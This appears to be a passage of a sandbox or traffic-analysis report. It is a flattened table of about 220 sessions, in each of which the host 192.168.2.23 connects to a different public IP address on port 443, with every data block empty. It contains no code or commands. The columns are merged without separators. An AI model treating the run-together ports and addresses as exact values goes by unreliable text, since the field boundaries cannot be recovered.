                                            11693192.168.2.2335404197.47.105.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11694192.168.2.2343648128.186.246.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11695192.168.2.2349848194.203.26.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11696192.168.2.2350152201.76.140.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11697192.168.2.2347414140.232.137.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11698192.168.2.2336512154.14.40.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11699192.168.2.2336974181.31.255.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11700192.168.2.2346728205.192.136.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11701192.168.2.2346140219.126.171.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11702192.168.2.233706273.107.34.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11703192.168.2.2347842180.138.49.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11704192.168.2.2336678130.51.127.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11705192.168.2.2339852126.58.0.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11706192.168.2.2356746203.95.183.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11707192.168.2.2344574148.50.159.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11708192.168.2.2339206163.132.114.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11709192.168.2.2351808170.209.119.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11710192.168.2.235915061.134.254.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11711192.168.2.2349030211.151.250.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11712192.168.2.2359002152.76.76.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11713192.168.2.235305670.68.153.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11714192.168.2.2360770219.214.136.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11715192.168.2.23339729.240.198.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11716192.168.2.2347700150.241.68.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11717192.168.2.2333578217.108.237.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11718192.168.2.233984865.203.248.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11719192.168.2.2349802106.255.119.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11720192.168.2.23442922.115.117.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11721192.168.2.2350456210.190.172.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11722192.168.2.2356010118.101.249.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11723192.168.2.2343846158.203.133.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11724192.168.2.2336758206.146.79.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11725192.168.2.233829864.237.205.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11726192.168.2.235485292.167.45.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11727192.168.2.234083085.10.13.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11728192.168.2.2336488220.218.243.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11729192.168.2.233668424.18.81.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11730192.168.2.2338038139.221.142.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11731192.168.2.2338928218.88.39.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11732192.168.2.233583820.61.111.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11733192.168.2.2352792205.119.81.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11734192.168.2.235243250.209.39.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11735192.168.2.235908069.124.169.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11736192.168.2.2341776213.32.10.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11737192.168.2.2353356194.144.84.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11738192.168.2.235116499.8.109.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11739192.168.2.235323864.76.7.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11740192.168.2.2342418168.169.126.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11741192.168.2.234358037.173.101.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11742192.168.2.233490485.153.129.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11743192.168.2.2345424138.57.150.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11744192.168.2.2349618199.154.254.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11745192.168.2.2341020157.47.209.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11746192.168.2.2334866113.34.113.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11747192.168.2.2347004114.210.13.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11748192.168.2.2354184118.245.208.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11749192.168.2.2336958196.235.93.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11750192.168.2.2357026177.30.162.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11751192.168.2.2340756106.131.153.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11752192.168.2.2342918144.79.197.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11753192.168.2.235161496.144.65.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11754192.168.2.234520877.30.84.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11755192.168.2.2344820102.76.57.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11756192.168.2.2360536207.202.121.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11757192.168.2.2344944177.98.143.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11758192.168.2.2335044168.20.19.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11759192.168.2.233727280.246.254.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11760192.168.2.2345030117.154.243.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11761192.168.2.2341532126.231.162.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11762192.168.2.2351908110.185.67.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11763192.168.2.2334908183.16.69.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11764192.168.2.2342910222.113.58.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11765192.168.2.2343228191.110.16.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11766192.168.2.2332808177.60.234.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11767192.168.2.234301670.171.103.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11768192.168.2.235026839.170.185.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11769192.168.2.235797254.154.100.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11770192.168.2.235350280.233.168.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11771192.168.2.2342054131.252.143.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11772192.168.2.234621271.133.29.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11773192.168.2.235515639.9.242.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11774192.168.2.2339648196.48.14.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11775192.168.2.235334085.239.32.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11776192.168.2.2344036107.215.87.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11777192.168.2.234265667.182.51.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11778192.168.2.2352396112.167.1.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11779192.168.2.235291296.162.130.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11780192.168.2.2350748171.211.251.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11781192.168.2.233366079.186.2.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11782192.168.2.2334068147.61.20.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11783192.168.2.2348712101.17.20.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11784192.168.2.23389142.85.118.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11785192.168.2.2334184106.170.43.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11786192.168.2.234668667.194.0.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11787192.168.2.2341962109.38.235.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11788192.168.2.2353686169.121.185.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11789192.168.2.2360372126.170.7.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11790192.168.2.2337298167.252.148.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11791192.168.2.234735653.66.45.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11792192.168.2.2355914193.168.30.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11793192.168.2.235488479.227.170.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11794192.168.2.2357134139.229.254.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11795192.168.2.235434846.192.109.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11796192.168.2.236002669.60.184.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11797192.168.2.2358912151.182.77.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11798192.168.2.2351208202.151.90.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11799192.168.2.2336284203.211.117.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11800192.168.2.2346526166.12.152.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11801192.168.2.2348842152.205.149.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11802192.168.2.2348852177.222.101.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11803192.168.2.235868877.171.185.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11804192.168.2.2356494213.188.193.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11805192.168.2.2342996165.216.102.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11806192.168.2.233963264.248.191.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11807192.168.2.2359380184.14.221.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11808192.168.2.233502813.156.75.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11809192.168.2.2359312210.6.212.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11810192.168.2.2356822173.93.241.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11811192.168.2.2358296155.142.118.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11812192.168.2.2342748159.134.234.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11813192.168.2.234191483.206.198.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11814192.168.2.2349794160.22.132.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11815192.168.2.2359746150.150.20.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11816192.168.2.234588861.253.220.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11817192.168.2.235060036.136.12.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11818192.168.2.233895879.65.75.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11819192.168.2.2351478199.144.235.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11820192.168.2.2347202195.219.159.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11821192.168.2.234904031.54.166.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11822192.168.2.235489471.59.60.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11823192.168.2.2344390117.48.106.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11824192.168.2.2338470207.113.107.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11825192.168.2.2360724221.49.230.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11826192.168.2.233637417.244.179.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11827192.168.2.2344280194.182.136.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11828192.168.2.234058846.199.36.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11829192.168.2.2342130165.166.37.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11830192.168.2.2348038217.24.63.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11831192.168.2.2357750120.152.14.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11832192.168.2.2341562198.119.71.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11833192.168.2.2351796147.185.37.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11834192.168.2.235162659.31.93.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11835192.168.2.2336606103.16.187.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11836192.168.2.2356152142.206.226.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11837192.168.2.2359686124.145.183.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11838192.168.2.234093435.37.215.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11839192.168.2.2350410141.104.7.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11840192.168.2.2352198182.215.231.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11841192.168.2.2334018171.142.8.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11842192.168.2.2351036113.10.14.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11843192.168.2.235681041.97.71.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11844192.168.2.2345456211.102.15.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11845192.168.2.2356182149.235.241.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11846192.168.2.2356944157.23.164.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11847192.168.2.2333084177.5.123.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11848192.168.2.235651676.4.121.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11849192.168.2.2345764107.216.94.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11850192.168.2.2343940122.65.138.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11851192.168.2.235597489.49.16.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11852192.168.2.2334594177.168.142.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11853192.168.2.2337826171.142.95.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11854192.168.2.234480878.5.158.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11855192.168.2.2345760114.189.93.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11856192.168.2.2348526110.100.26.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11857192.168.2.234994893.84.44.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11858192.168.2.23563608.35.139.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11859192.168.2.234936234.26.17.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11860192.168.2.234933045.95.63.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11861192.168.2.2343964217.121.178.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11862192.168.2.233375881.113.161.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11863192.168.2.235145453.135.75.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11864192.168.2.2338300190.154.65.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11865192.168.2.2333636154.103.218.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11866192.168.2.236020052.19.130.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11867192.168.2.2355150120.172.66.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11868192.168.2.23436764.122.235.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11869192.168.2.2337450197.247.17.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11870192.168.2.2353722136.50.14.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11871192.168.2.234048088.206.78.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11872192.168.2.234416652.177.183.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11873192.168.2.2345334165.15.50.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11874192.168.2.2359802179.56.61.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11875192.168.2.234936413.137.185.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11876192.168.2.235684632.16.213.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11877192.168.2.2345730145.237.133.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11878192.168.2.233410617.202.13.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11879192.168.2.2341232181.180.112.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11880192.168.2.2358280151.204.74.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11881192.168.2.2349858187.207.162.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11882192.168.2.233778635.148.114.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11883192.168.2.234661252.75.231.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11884192.168.2.2352734185.132.176.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11885192.168.2.234362892.131.180.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11886192.168.2.235261652.137.57.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11887192.168.2.234627477.218.123.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11888192.168.2.2348514143.226.87.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11889192.168.2.2352366173.29.57.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11890192.168.2.235590823.97.81.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11891192.168.2.233987841.68.15.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11892192.168.2.2359012141.72.14.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11893192.168.2.233555895.89.216.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11894192.168.2.236045482.185.254.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11895192.168.2.2340412125.195.13.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11896192.168.2.2345708131.161.155.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11897192.168.2.233590686.4.191.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11898192.168.2.2338254100.17.248.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11899192.168.2.2334210110.145.253.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11900192.168.2.234758447.20.78.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11901192.168.2.233694296.188.228.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11902192.168.2.2360716116.106.125.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11903192.168.2.234620098.199.182.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11904192.168.2.235737454.73.84.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11905192.168.2.233975276.252.166.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11906192.168.2.23496748.188.177.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11907192.168.2.23566461.213.27.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11908192.168.2.234008635.28.91.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11909192.168.2.2345296101.123.203.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11910192.168.2.235674882.154.26.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11911192.168.2.2358378136.241.28.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11912192.168.2.2358398104.224.221.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11913192.168.2.2347206100.240.239.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11914192.168.2.2354204201.23.189.132443
                                            TimestampBytes transferredDirectionData


